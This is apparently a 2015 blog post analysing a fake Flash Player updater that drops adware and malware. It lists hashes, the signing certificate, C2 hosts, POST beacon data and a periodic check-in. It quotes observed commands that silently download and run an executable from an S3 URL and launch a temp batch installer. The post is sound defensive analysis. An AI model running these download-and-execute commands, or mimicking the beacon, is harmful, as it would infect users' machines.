Fake Flash Player Updater.. installs droppers, malware and advertising components.

I came across a bit of crap today which, I’m not sure how the user ended up on it, claimed that it was a Flash Player Update when browsing a website.

SHA256: 1047c747b1ae3fa34192c3851d358ed0c4369daf8e2c70fc9f2a3c0d256d16b1
VirusTotal Report / Malwr Report

Setup.exe – Signed with a valid certificate S/N: “‎0e 92 3b 9c f6 0d a5 9f c3 a4 3a 87 a8 07 1f c2”

Publisher Plugin Update S.L.
Product taskhost
Original name taskhost.exe
Internal name taskhost.exe
File version 5. 4. 5. 4

clickyes program name

When you run the file, in my case, it made the following requests:


Host: maxirg00.maxisrv.com []
inetnum: –
netname: OVH_69328147
descr: OVH Static IP
country: PL
The domain whois is protected with a privacy service.

Containing the following POST data:

data={“publisher”: “638”, “uid”: “1420730682899BJjYYTITkj”, “campaign”: “1844”, “lpd”: “www.thefilesbox.com”, “ip”: “”, “tt”: “6176d2f3a243f29b0b25b2047636830f63c7c4ff”, “fileName”: “Setup”, “requestHost”: “e4lvdpezempl.v6kgr1d.com”, “referer”: “”, “sbb_check”: “[‘1’]”, “time”: “2015/01/08 15:24:43”, “userAgent”: “Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36”, “osVersion”: “0”, “os”: “Win7”, “browser”: “ch”, “url”: “”, “usedBrowser”: “ch”, “sign”: “uv9”, “caption”: “”, “host”: “domain.com”, “carrier”: “FastPlayerPro”,”version”:”2.0.15″,”1″:0,”2″:0,”3″:0,”4″:0,”5″:0,”6″:0,”7″:0,”8″:1,”9″:0,”10″:0,”11″:0,”12″:0,”13″:0,”14″:1,”15″:0,”17″:0,”18″:0,”19″:0,”20″:0,”21″:0,”22″:0,”23″:1,”24″:0,”25″:0,”26″:0,”27″:0,”28″:0,”29″:0,”30″:0,”31″:1,”32″:0,”33″:0,”34″:0,”35″:0,”36″:0,”37″:0,”38″:0,”39″:0,”40″:0,”41″:0,”42″:0,”TYPE”:”TP”}

The domain in the above text, thefilesbox.com, is also registered using the same privacy service as the spamware domain. This domain doesn’t seem to be resolving right now though.

It then responds with nearly 500kb of data which can be seen here: http://pastebin.mozilla.org/8231405

It looks like the behavior or junk installed might vary depending on what anti-viruses exist on the system.

What is quite funny is one of the variables: gratitudeURL has the phrase “Thank you for trusting us for your downloads”.. given that they are just about to install a virus on your system this seems a bit rich.
The domain it is hosted on, step-congrats.com, is also has whois privacy applied by the same company as the other domains involved. The http content is hosted at Amazon Web Services

c:\windows\rcore.exe gets dumped into your system by one of the things it downloads.
VirusTotal Report / Malwr Report
SHA256: 6c378c52c4dfc12d09e937aa3e1ab75245a6a6c2c4ec7b1a46b9a28e29e7113f

flash fake updater

Every 60 seconds it continues to make contact with
Which replies with 7, MAXTHX,, 0.

The entire traffic style is very similar to a botnet CnC type communication.

If you are stupid and accept the install / click next.. it then goes crazy with requests to random partners / installs.

massive infection

Commands such as the following..
C:\Users\User\AppData\Local\Temp\nsa4AF6.tmp\check20.exe http://pepperware.s3.amazonaws.com/pepperzip/update/update.exe update.exe /S /A 10115

C:\Windows\system32\cmd.exe /c “”C:\Users\User\AppData\Local\Temp\2840.bat” “C:\Users\User\AppData\Local\Temp\cddc8884-cdfb-42d1-ac19-103343754823\setup.exe””

Other domains involved:

Hosted at Amazon Web Services. Domain whois protection by the same company as all the other domains.

Hosted at Amazon Web Services. Domain whois protection by the same company as all the other domains.

All the working domains seem to use the following DNS servers:


This entry was posted in Uncategorized. Bookmark the permalink.

Comment on this topic

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s